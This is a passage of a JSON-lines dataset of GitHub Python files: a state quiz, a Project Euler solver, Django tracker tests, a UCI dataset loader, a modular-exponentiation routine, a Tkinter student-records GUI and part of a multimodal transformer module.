pandas.read_csv(\"50_states.csv\")\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\n\r\nwhile len(guessed_states) < 50:\r\n    answer = screen.textinput(f\"{len(guessed_states)}/50 Correct\", \"Name of a State: \").title()\r\n    \r\n    state = data[data['state'] == answer]\r\n    if not state.empty:\r\n        writer.goto(int(state.x), int(state.y))\r\n        writer.write(answer)\r\n        guessed_states.append(answer)\r\n    if answer == 'Exit':\r\n        missing_states = [state for state in all_states if state not in guessed_states]\r\n        # for state in all_states:\r\n        #     if state not in guessed_states:\r\n        #         missing_states.append(state)\r\n        df = pandas.DataFrame(missing_states)\r\n        df.to_csv(\"missing_states.csv\")\r\n        break\r\n    \r\n","repo_name":"Ghosdak/USStateQuiz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26889714029","text":"#!/usr/bin/env python\n\nwith open('data/primes.txt') as f:\n    PRIME_FACTORS = []\n    for num in f:\n        if int(num) <= 1000:\n            PRIME_FACTORS.append(int(num))\n        else:\n            break\n\n\ndef find_change(target=11):\n\n    while True:\n        number_ways = [1] + [0] * target\n        for prime in PRIME_FACTORS:\n            for n in range(prime, target + 1):\n                number_ways[n] += number_ways[n - prime]\n        if number_ways[target] > 5000:\n            return target\n        target += 1\n\n\ndef main():\n    first5000 = find_change()\n    print(first5000)\n\n\nif __name__ == \"__main__\":\n    
main()\n","repo_name":"chadheyne/project-euler","sub_path":"problem077.py","file_name":"problem077.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36168955108","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\nfrom django.test import TestCase, Client\nimport json, time, sys, datetime\nimport os\nos.environ['DISPLAY'] = ':0'\n\nfrom tracker import models\nfrom tracker import tasktrack\nfrom tracker import views\n# import psutil\n\nfrom riglib.experiment import LogExperiment\n\n\nclass TestDataFile(TestCase):\n def setUp(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te.save()\n\n system = models.System(name=\"test_system\", path=\"\", archive=\"\")\n system.save()\n\n def test_file_linking(self):\n te = models.TaskEntry.objects.all()[0]\n system = models.System.objects.get(name=\"test_system\")\n data_file = models.DataFile(path=\"dummy_file_path\", system_id=system.id, entry_id=te.id)\n data_file.save()\n\n data_file = models.DataFile.objects.get(path=\"dummy_file_path\")\n\n self.assertTrue(data_file.entry_id == te.id)\n self.assertTrue(data_file.system_id == system.id)\n\n #def test_data_file_linking_through_post(self):\n # c = Client()\n # post_data = {'file_path':\"dummy_file_path\", 'data_system_id':1}\n # te = models.TaskEntry.objects.all()[0]\n # c.post(\"/exp_log/link_data_files/%d/submit\" % te.id, post_data)\n\n # data_file = models.DataFile.objects.get(path=\"dummy_file_path\")\n # self.assertEqual(data_file.entry_id, te.id)\n\n\nclass TestModels(TestCase):\n def test_add_new_task_to_table(self):\n c = Client()\n\n post_data = {\"name\": \"test_add_new_task_to_table\",\n \"import_path\": \"riglib.experiment.LogExperiment\"}\n resp = c.post(\"/setup/add/new_task\", post_data)\n\n task = models.Task.objects.get(name=\"test_add_new_task_to_table\")\n task_cls = task.get()\n self.assertEqual(task_cls, LogExperiment)\n\n def test_add_new_feature_to_table(self):\n c = Client()\n post_data = {\"name\": \"saveHDF\",\n \"import_path\": \"features.hdf_features.SaveHDF\"}\n resp = c.post(\"/setup/add/new_feature\", post_data)\n\n feat = models.Feature.objects.get(name=\"saveHDF\")\n feat_cls = feat.get()\n from features.hdf_features import SaveHDF\n self.assertEqual(feat_cls, SaveHDF)\n\n feat.delete()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n def test_add_new_subject_from_POST(self):\n test_name = \"test_subject_post\"\n c = Client()\n post_data = {\"subject_name\": test_name}\n\n resp = c.post(\"/setup/add/new_subject\", post_data)\n\n subj = models.Subject.objects.get(name=test_name)\n self.assertEqual(subj.name, test_name)\n\n def test_add_built_in_feature_from_POST(self):\n c = Client()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n post_data = {\"saveHDF\": 1}\n resp = c.post(\"/setup/add/enable_features\", post_data)\n\n from features.hdf_features import SaveHDF\n feat = models.Feature.objects.get(name=\"saveHDF\")\n self.assertEqual(feat.get(), SaveHDF)\n\n feat.delete()\n self.assertEqual(len(models.Feature.objects.all()), 0)\n\n def 
test_add_new_task_no_features(self):\n task = models.Task(name=\"test_task\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n task_cls = task.get()\n from riglib.experiment import LogExperiment\n self.assertEqual(task_cls, LogExperiment)\n\n def test_create_task_entry(self):\n \"\"\"\n \"\"\"\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te.save()\n\n def test_task_entry_collections(self):\n # setup\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n te1 = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te1.save()\n\n te2 = models.TaskEntry(subject_id=subj.id, task_id=task.id)\n te2.save()\n\n col = models.TaskEntryCollection(name=\"new_col\")\n col.save()\n col.add_entry(te1)\n\n self.assertEqual(len(col.entries.all()), 1)\n\n # adding the same entry twice shouldn't do anything\n col.add_entry(te1)\n self.assertEqual(len(col.entries.all()), 1)\n\n # adding a second entry should increase the length of the list\n col.add_entry(te2)\n self.assertEqual(len(col.entries.all()), 2)\n\n # remove_entry should cause a change in the list\n col.remove_entry(te1)\n self.assertEqual(len(col.entries.all()), 1)\n self.assertEqual(col.entries.all()[0].id, te2.id)\n\n\nclass TestExpLog(TestCase):\n def test_list_exp_history(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n subj = models.Subject.objects.get(name=\"test_subject\")\n\n task = models.Task(name=\"test_task\")\n task.save()\n task = models.Task.objects.get(name=\"test_task\")\n\n list_data0 = views._list_exp_history()\n self.assertEqual(len(list_data0['entries']), 0)\n self.assertEqual(len(list_data0['subjects']), 1)\n self.assertEqual(len(list_data0['tasks']), 1)\n self.assertEqual(len(list_data0['features']), 0)\n self.assertEqual(len(list_data0['generators']), 0)\n\n te1 = models.TaskEntry(subject_id=subj.id, task_id=task.id, date=datetime.datetime.now())\n te1.save()\n\n list_data1 = views._list_exp_history()\n self.assertEqual(len(list_data1['entries']), 1)\n self.assertEqual(len(list_data1['subjects']), 1)\n self.assertEqual(len(list_data1['tasks']), 1)\n self.assertEqual(len(list_data1['features']), 0)\n self.assertEqual(len(list_data1['generators']), 0)\n\n\n for k in range(300):\n te2_date = datetime.datetime.now() - datetime.timedelta(days=k)\n te2 = models.TaskEntry(subject_id=subj.id, task_id=task.id, date=te2_date)\n te2.save()\n\n # all entries returned if no args\n list_data2 = views._list_exp_history()\n self.assertEqual(len(list_data2['entries']), 301)\n\n # 'listall' should return all entries\n list_data3 = views._list_exp_history(max_entries=100)\n self.assertEqual(len(list_data3['entries']), 100)\n\nclass TestGenerators(TestCase):\n def test_generator_retreival(self):\n task = models.Task(name=\"test_task1\", import_path=\"riglib.experiment.mocks.MockSequenceWithGenerators\")\n task.save()\n\n models.Generator.populate()\n self.assertEqual(len(models.Generator.objects.all()), 2)\n\n\nclass TestVisualFeedbackTask(TestCase):\n def test_start_experiment_python(self):\n import json\n from 
built_in_tasks.passivetasks import TargetCaptureVFB2DWindow\n from riglib import experiment\n from features import Autostart\n from tracker import json_param\n\n try:\n import pygame\n except ImportError:\n print(\"Skipping test due to pygame missing\")\n return\n\n # Create all the needed database entries\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"test_vfb\", import_path=\"built_in_tasks.passivetasks.TargetCaptureVFB2DWindow\")\n task.save()\n\n models.Generator.populate()\n gen = models.Generator.objects.get(name='centerout_2D_discrete')\n\n seq_params = dict(nblocks=1, ntargets=1)\n seq_rec = models.Sequence(generator=gen,\n params=json.dumps(seq_params), task=task)\n seq_rec.save()\n print(seq_rec)\n\n task_rec = models.Task.objects.get(name='test_vfb')\n te = models.TaskEntry(task=task_rec, subject=subj)\n te.save()\n\n seq, seq_params = seq_rec.get()\n\n # Start the task\n base_class = task.get_base_class()\n Task = experiment.make(base_class, feats=[])\n\n params = json_param.Parameters.from_dict(dict(window_size=(480, 240)))\n params.trait_norm(Task.class_traits())\n\n saveid = te.id\n task_start_data = dict(subj=subj.id, base_class=base_class, feats=[Autostart],\n params=dict(window_size=(480, 240)), seq=seq_rec, seq_params=seq_params,\n saveid=saveid)\n\n tracker = tasktrack.Track.get_instance()\n tracker.runtask(cli=True, **task_start_data)\n\n\nclass TestTaskStartStop(TestCase):\n def test_start_experiment_python(self):\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n task_start_data = dict(subj=subj.id, base_class=task.get_base_class(), feats=[],\n params=dict())\n\n # task_start_data = dict(subj=1, task=1, feats=dict(), params=dict(), sequence=None)\n tracker = tasktrack.Track.get_instance()\n tracker.runtask(cli=True, **task_start_data)\n\n time.sleep(5)\n tracker.stoptask()\n\n def test_start_experiment_ajax(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n task_start_data = dict(subject=1, task=1, feats=dict(), params=dict(), sequence=None)\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n self.assertTrue(tracker.task_running())\n\n # check the 'state' of the task\n self.assertEqual(tracker.task_proxy.get_state(), \"wait\")\n\n # update report stats\n tracker.task_proxy.update_report_stats()\n\n # access report stats\n reportstats = tracker.task_proxy.reportstats\n self.assertTrue(len(reportstats.keys()) > 0)\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\n def test_start_experiment_with_features(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.LogExperiment\")\n task.save()\n\n feat = models.Feature(name=\"saveHDF\", import_path=\"features.hdf_features.SaveHDF\")\n feat.save()\n\n task_start_data = dict(subject=1, task=1, feats={\"saveHDF\":\"saveHDF\"}, params=dict(), sequence=None)\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n 
start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n self.assertTrue(tracker.task_running())\n\n # check the 'state' of the task\n self.assertEqual(tracker.task_proxy.get_state(), \"wait\")\n\n # update report stats\n tracker.task_proxy.update_report_stats()\n\n # access report stats\n reportstats = tracker.task_proxy.reportstats\n self.assertTrue(len(reportstats.keys()) > 0)\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\nclass TestTaskAnnotation(TestCase):\n def test_annotate_experiment(self):\n c = Client()\n\n subj = models.Subject(name=\"test_subject\")\n subj.save()\n\n task = models.Task(name=\"generic_exp\", import_path=\"riglib.experiment.mocks.MockSequenceWithGenerators\")\n task.save()\n\n models.Generator.populate()\n\n feat = models.Feature(name=\"saveHDF\", import_path=\"features.hdf_features.SaveHDF\")\n feat.save()\n\n task_start_data = dict(subject=1, task=1, feats={\"saveHDF\":\"saveHDF\"}, params=dict(),\n sequence=dict(generator=1, name=\"seq1\", params=dict(n_targets=1000), static=False))\n\n post_data = {\"data\": json.dumps(task_start_data)}\n\n # if sys.platform == \"win32\":\n start_resp = c.post(\"/test\", post_data)\n start_resp_obj = json.loads(start_resp.content.decode(\"utf-8\"))\n\n tracker = tasktrack.Track.get_instance()\n h5file = tracker.task_proxy.get_h5_filename()\n self.assertTrue(tracker.task_running())\n\n time.sleep(2)\n c.post(\"/exp_log/record_annotation\", dict(annotation=\"test post annotation\"))\n\n time.sleep(2)\n stop_resp = c.post(\"/exp_log/stop/\")\n\n time.sleep(2)\n self.assertFalse(tracker.task_running())\n\n # check that the annotation is recorded in the HDF5 file\n import h5py\n hdf = h5py.File(h5file, \"r\") # open read-only\n self.assertTrue(b\"annotation: test post annotation\" in hdf[\"/task_msgs\"][\"msg\"][:])\n\n\nclass TestParamCast(TestCase):\n def test_norm_trait(self):\n from tracker import json_param\n from riglib.experiment import traits\n\n t = traits.Float(1, descr='test trait')\n t1 = json_param.norm_trait(t, 1.0)\n self.assertEqual(t1, 1.0)\n\n #self.assertRaises(Exception, json_param.norm_trait, t, '1.0')\n","repo_name":"carmenalab/brain-python-interface","sub_path":"db/tracker/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"40746070810","text":"\"\"\"Bike sharing dataset from the UCI machine learning repository.\"\"\"\n\nfrom __future__ import annotations\n\nfrom io import BytesIO\nfrom typing import Optional, Tuple\nfrom zipfile import ZipFile\n\nimport pandas as pd\nfrom probnum import backend\nimport requests\n\nfrom ._uci_dataset import UCIDataset\n\n\nclass BikeSharing(UCIDataset):\n \"\"\"Bike sharing dataset (17,379 × 16). [1]_\n\n This dataset contains the hourly (and daily) count of rental bikes between years\n 2011 and 2012 of the Capital bikeshare system with the corresponding weather and\n seasonal information.\n\n Source: https://archive.ics.uci.edu/ml/datasets/bike+sharing+dataset\n\n References\n ----------\n .. 
[1] Fanaee-T, Hadi, and Gama, Joao, \"Event labeling combining ensemble detectors\n and background knowledge\", Progress in Artificial Intelligence (2013): pp.\n 1-15, Springer Berlin Heidelberg, doi:10.1007/s13748-013-0040-3.\n \"\"\"\n\n URL = \"https://archive.ics.uci.edu/ml/machine-learning-databases/00275/\"\n\n def __init__(self, dir: Optional[str] = \"data/uci/bike\", overwrite: bool = False):\n super().__init__(dir, overwrite)\n\n @staticmethod\n def _download() -> backend.Array:\n # Download and unzip archive\n r = requests.get(BikeSharing.URL + \"Bike-Sharing-Dataset.zip\")\n files = ZipFile(BytesIO(r.content))\n\n # Read data for the hourly count\n df = pd.read_csv(files.open(\"hour.csv\"))\n\n # Convert dates to numeric\n df[\"dteday\"] = pd.to_datetime(df[\"dteday\"]).astype(int)\n\n return backend.asarray(df)\n\n @staticmethod\n def _preprocess(\n raw_data: backend.Array,\n ) -> Tuple[backend.Array, backend.Array, backend.Array]:\n\n # Preprocess\n X = raw_data[:, 0:-1]\n y = raw_data[:, -1]\n\n # Transform outputs\n y = backend.log(y)\n y = y - backend.mean(y, axis=0)\n\n # Normalize features\n X = (X - backend.mean(X, axis=0)) / backend.std(X, axis=0)\n\n # Select train-test split\n train_idcs = UCIDataset._get_train_idcs(\n rng_state=backend.random.rng_state(2494), num_data=X.shape[0]\n )\n\n return X, y, train_idcs\n","repo_name":"JonathanWenger/itergp","sub_path":"src/itergp/datasets/uci/_bike_sharing.py","file_name":"_bike_sharing.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"35983355864","text":"\na, b, c = list(map(int, input().split()))\n\n\n# Fast modular exponentiation: record how b shrinks (subtract 1 when odd,\n# halve when even), then replay the steps in reverse starting from a**1,\n# squaring for the even steps and multiplying by a for the odd ones,\n# reducing mod c throughout.\ndef solution(a, b, c):\n result = a\n series = []\n while b != 1:\n series.append(b)\n if b % 2:\n b -= 1\n else:\n b = int(b//2)\n while series:\n s = series.pop()\n if s % 2:\n result = (result * a) % c\n else:\n result = (result ** 2) % c\n return result % c\n\n\nprint(solution(a, b, c))\n","repo_name":"TERADA-DANTE/algorithm","sub_path":"python/acmicpc/solved/_1629.py","file_name":"_1629.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22863459216","text":"import DB_Funct\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\nfrom PIL import ImageTk, Image\r\nimport re\r\n\r\ndef viewALL():\r\n records = DB_Funct.View()\r\n #print(records)\r\n clearTree() # clear before displaying\r\n for row in records:\r\n tv.insert(\"\", 0, values=row)\r\n'''\r\ndef validateName(name):\r\n if not re.match(\"^[a-z]*$\", name):\r\n print(\"Only Alphabet Allowed\")\r\n'''\r\n\r\n \r\n#def validateMark():\r\n \r\n'''\r\ndef validateActive():\r\n''' \r\n\r\ndef dbAdd():\r\n name = studentName_field.get()\r\n #validateName(name)\r\n lName = studentLName_field.get()\r\n imgL = imgLoc_field.get()\r\n mark = mark_field.get()\r\n #if mark0 != '':\r\n # mark=mark0\r\n active = active_field.get()\r\n #print(name,lName,imgL,mark, active)\r\n DB_Funct.Add(name,lName,imgL,mark, active)\r\n reset()\r\n \r\ndef update():\r\n ID = studentID_field.get()\r\n name = studentName_field.get()\r\n lName = studentLName_field.get()\r\n imgL = imgLoc_field.get()\r\n mark = mark_field.get()\r\n active = active_field.get()\r\n #print(name,lName,imgL,mark, active)\r\n DB_Funct.Update(ID,name,lName,imgL,mark, active)\r\n reset()\r\n\r\ndef search():\r\n ID = studentID_field.get()\r\n name = studentName_field.get()\r\n lName = 
studentLName_field.get()\r\n active = active_field.get()\r\n mark = mark_field.get()\r\n data = DB_Funct.Search(ID,name, lName, active, mark)\r\n clearTree()\r\n for row in data:\r\n tv.insert(\"\", 0, values=row)\r\n \r\n \r\ndef reset():\r\n setDefaultImage()\r\n clearTree()\r\n viewALL()\r\n clearTop()\r\n\r\n\r\ndef insertTree(rows):\r\n # the rows to display must be passed in; iterating the builtin 'list'\r\n # (as the original did) walks over a type, not data\r\n for row in rows:\r\n tv.insert(\"\", 0, values=row)\r\n #tv.insert('',END,values=row)\r\ndef clearTree():\r\n x = tv.get_children()\r\n \r\n for item in x:\r\n tv.delete(item)\r\n setDefaultImage()\r\ndef deleteLine():\r\n ID = studentID_field.get()\r\n #print(ID,\"to be deleted\")\r\n DB_Funct.Delete(ID)\r\n reset()\r\n \r\ndef clearTop():\r\n studentID_field.delete(0,END)\r\n studentName_field.delete(0,END)\r\n studentLName_field.delete(0,END)\r\n mark_field.delete(0, END)\r\n active_field.delete(0, END)\r\n imgLoc_field.delete(0, END)\r\n setDefaultImage()\r\n\r\n\r\ndef select_item(event):\r\n row = tv.item(tv.selection())\r\n #print(\"row\",type(row),row)\r\n item = tv.selection()[0]\r\n #print ('item clicked ', item)\r\n #print (tv.item(item)['values'][0])\r\n studentID_field.delete(0,END)\r\n studentName_field.delete(0,END)\r\n studentLName_field.delete(0,END)\r\n mark_field.delete(0, END)\r\n active_field.delete(0, END)\r\n imgLoc_field.delete(0, END)\r\n studentID_field.insert(END,row['values'][0])\r\n studentName_field.insert(END,row['values'][1])\r\n studentLName_field.insert(END,row['values'][2])\r\n imgLoc_field.insert(END,row['values'][3])\r\n mark_field.insert(END,row['values'][4])\r\n active_field.insert(END,row['values'][5])\r\n pic = imgLoc_field.get()\r\n imgChange(pic)\r\n '''\r\n img=ImageTk.PhotoImage(Image.open('img/'+ pic).resize((120,120)))\r\n photoHolder.configure(image=img)\r\n photoHolder.image = img\r\n '''\r\n#changes images\r\ndef imgChange(pic):\r\n try:\r\n img=ImageTk.PhotoImage(Image.open('img/'+ pic).resize((120,120)))\r\n photoHolder.configure(image=img)\r\n photoHolder.image = img\r\n except FileNotFoundError:\r\n errorImg()\r\n except IsADirectoryError:\r\n errorImg()\r\n\r\ndef errorImg():\r\n holder=\" - No Such File\"\r\n #default=ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120)))\r\n #photoHolder.configure(image=default)\r\n #photoHolder.image = default\r\n setDefaultImage()\r\n imgLoc_field.insert(END,holder)\r\n\r\ndef setDefaultImage():\r\n default=ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120)))\r\n photoHolder.configure(image=default)\r\n photoHolder.image = default\r\n \r\n#def errorInput():\r\n \r\n'''\r\n\r\ndef imageSwap():\r\n \r\n img = ImageTk.PhotoImage(Image.open('img/eye.jpg').resize((120,120))) #\"img/\"+str(pic)\r\n \r\n ''' \r\n\r\n \r\n\r\n \r\n\r\nwin = Tk()\r\n#Background\r\nwin.title(\"Student Record\")\r\nwin.geometry(\"950x400\")\r\nwin.configure(background='LightGreen')\r\n#Student Frame\r\nstudentFrame = LabelFrame(win, text='Student')\r\nstudentFrame.configure(background='LightBlue2')\r\nstudentFrame.grid(row=0, column=0,sticky=NSEW, padx=8, pady=8)\r\n#row/column set the position.\r\n#padx/y deal with the padding of the element\r\n\r\n\r\n\r\n\r\n\r\n#Student Name\r\nstudentName = Label(studentFrame,text='First Name: ')\r\nstudentName.grid(row=0, column=1, padx=8)\r\nstudent_text = StringVar()\r\nstudentName_field = Entry(studentFrame,textvariable=student_text)\r\nstudentName_field.grid(row=0, column=2, padx=5)\r\n\r\n#Student Surname\r\n\r\nstudentLName = Label(studentFrame,text='Last Name: ')\r\nstudentLName.grid(row=2, column=1, 
pady=8)\r\nstudentLName_text = StringVar()\r\nstudentLName_field = Entry(studentFrame,textvariable=studentLName_text)\r\nstudentLName_field.grid(row=2, column=2)\r\n\r\n#Image Location\r\n\r\nimgLoc = Label(studentFrame,text='Image Loc: ')\r\nimgLoc.grid(row=3, column=1, pady=8)\r\nimgLoc_text = StringVar()\r\nimgLoc_field = Entry(studentFrame,textvariable=imgLoc_text)\r\nimgLoc_field.grid(row=3, column=2)\r\n\r\n#Photo Placeholder\r\n#photo=imgLoc_field.get()\r\n#print(photo)\r\nopenImage = Image.open('img/eye.jpg') #'img/eye.jpg'\r\nimg=ImageTk.PhotoImage(openImage.resize((120,120)))\r\nphotoHolder = Label(studentFrame, image = img)\r\nphotoHolder.grid(row=0, column=0, rowspan=5, pady = 2, padx=2)\r\n\r\n#Student ID\r\nstudentID = Label(studentFrame,text='Student ID: ')\r\nstudentID.grid(row=0, column=3, padx=2)\r\nstudentID_text = StringVar()\r\nstudentID_field = Entry(studentFrame,textvariable=studentID_text)\r\nstudentID_field.grid(row=0, column=4, padx=8)\r\n\r\n#Mark\r\nmark = Label(studentFrame,text='Mark: ')\r\nmark.grid(row=2, column=3, padx=15)\r\nmark_text = StringVar()\r\nmark_field = Entry(studentFrame,textvariable=mark_text)\r\nmark_field.grid(row=2, column=4, padx=8)\r\n\r\n#Active\r\nactive = Label(studentFrame,text='Active: ')\r\nactive.grid(row=3, column=3, padx=8)\r\nactive_text = StringVar()\r\nactive_field = Entry(studentFrame,textvariable=active_text)\r\nactive_field.grid(row=3, column=4)\r\n\r\n\r\n\r\n\r\n#buttons\r\nbtnFrame = LabelFrame(win,text='Action:')\r\nbtnFrame.configure(background='DarkViolet')\r\nbtnFrame.grid(row=0, column=3,sticky=NSEW,rowspan = 8, padx=8,pady=8)\r\nb1=Button(btnFrame,text=\"View all\",width=16, height=2, command=viewALL)\r\nb1.grid(row=0, column=0, pady=4)\r\n\r\nb2=Button(btnFrame,text=\"Search Entry\",width=16, height=2, command=search)\r\nb2.grid(row=3, column=0, pady=4)\r\n\r\nb3=Button(btnFrame,text=\"Add Entry\",width=16, height=2, command=dbAdd)\r\nb3.grid(row=4, column=0, pady=4)\r\n\r\nb4=Button(btnFrame,text=\"Update\",width=16, height=2, command=update)\r\nb4.grid(row=5, column=0, pady=4)\r\n\r\nb5=Button(btnFrame,text=\"Delete\",width=16, height=2, command=deleteLine)\r\nb5.grid(row=6, column=0, pady=4)\r\n\r\nb6=Button(btnFrame,text=\"Close\",width=16, height=2, command=win.destroy)\r\nb6.grid(row=7, column=0, padx = 6, pady=4)\r\n\r\nb7=Button(btnFrame,text=\"Clear Display\",width=16, height=2, command=clearTree)\r\nb7.grid(row=2, column=0, pady=4)\r\n\r\nb8=Button(btnFrame,text=\"Clear Student\",width=16, height=2, command=clearTop)\r\nb8.grid(row=1, column=0, pady=4)\r\n\r\n#win.mainloop()\r\n\r\n\r\n#Version 3\r\n\r\n\r\ndispFrame = LabelFrame(win, text='Display:')\r\ndispFrame.configure(background='Pink')\r\ndispFrame.grid(row=1, column=0, sticky=NSEW, padx=8, pady=8)\r\ntv = ttk.Treeview(dispFrame, height=10, columns=3)\r\ntv.grid(row=1, column=1, columnspan=6)\r\ntv[\"columns\"] = [\"Student ID\", \"First Name\", \"Last Name\", \"Image Loc\", \"Mark\", \"Active\"]\r\ntv[\"show\"] = \"headings\"\r\ntv.heading(\"Student ID\", text=\"Student ID\")\r\ntv.column(\"Student ID\", anchor='center', width=120)\r\ntv.heading(\"First Name\", text=\"First Name\")\r\ntv.column(\"First Name\", anchor='center', width=120)\r\ntv.heading(\"Last Name\", text=\"Last Name\")\r\ntv.column(\"Last Name\", anchor='center', width=120)\r\ntv.heading(\"Image Loc\", text=\"Image Loc\")\r\ntv.column(\"Image Loc\", anchor='center', width=120)\r\ntv.heading(\"Mark\", text=\"Mark\")\r\ntv.column(\"Mark\", anchor='center', 
width=120)\r\ntv.heading(\"Active\", text=\"Active\")\r\ntv.column(\"Active\", anchor='center', width=120)\r\n\r\n\r\n#Scrollbar\r\nsb1 = Scrollbar(dispFrame,command=tv.yview,\r\norient=VERTICAL)\r\nsb1.grid(row=0,column=7,rowspan=2,sticky='ns')\r\ntv.configure(yscrollcommand=sb1.set)\r\n\r\n#CONNECTING DISPLAY FRAMES\r\n\r\n\r\ntv.bind('<<TreeviewSelect>>', select_item) # virtual event fired when the Treeview selection changes\r\n\r\n#tv.bind('', select_item)\r\n#tv.bind('', select_item)\r\n#tv.bind('', select_item)\r\n#tv.bind('<1>', imgChange)\r\n\r\n\r\nwin.mainloop()\r\n\r\n\r\n\r\n\r\n","repo_name":"dim6ata/StudentRecords","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18022634833","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport math, copy\nimport numpy as np\nfrom basemodel_1D import TemporalConvNet\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef generate_mask_bidirectional(size, atten_len_a, atten_len_b):\n # Attention window mask: position i may attend to at most atten_len_a - 1\n # steps into the past and atten_len_b - 1 steps into the future.\n attn_shape = (1, size, size)\n past_all_mask = np.triu(np.ones(attn_shape), k=atten_len_b).astype('uint8')\n past_all_mask = torch.from_numpy(past_all_mask)\n past_all_mask = past_all_mask == 0\n past_all_mask = past_all_mask.byte()\n no_need_mask = np.triu(np.ones(attn_shape), k=-atten_len_a + 1).astype('uint8')\n no_need_mask = torch.from_numpy(no_need_mask)\n gene_mask = no_need_mask * past_all_mask\n\n return gene_mask.to(device)\n\n\n\ndef clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features)).to(device)\n self.b_2 = nn.Parameter(torch.zeros(features)).to(device)\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, layer, N):\n super(Encoder, self).__init__()\n self.layers = layer\n self.norm = LayerNorm(layer[0].size)\n\n def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass MultiModalEncoder(nn.Module):\n\n def __init__(self, layer, N, modal_num):\n super(MultiModalEncoder, self).__init__()\n self.modal_num = modal_num\n self.layers = layer\n self.norm = nn.ModuleList()\n for i in range(self.modal_num):\n self.norm.append(LayerNorm(layer[0].size))\n\n\n def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.norm[i](_x[i]))\n\n x = torch.cat(_x_list, dim=-1)\n\n return x\n\n\nclass SublayerConnection(nn.Module):\n\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def 
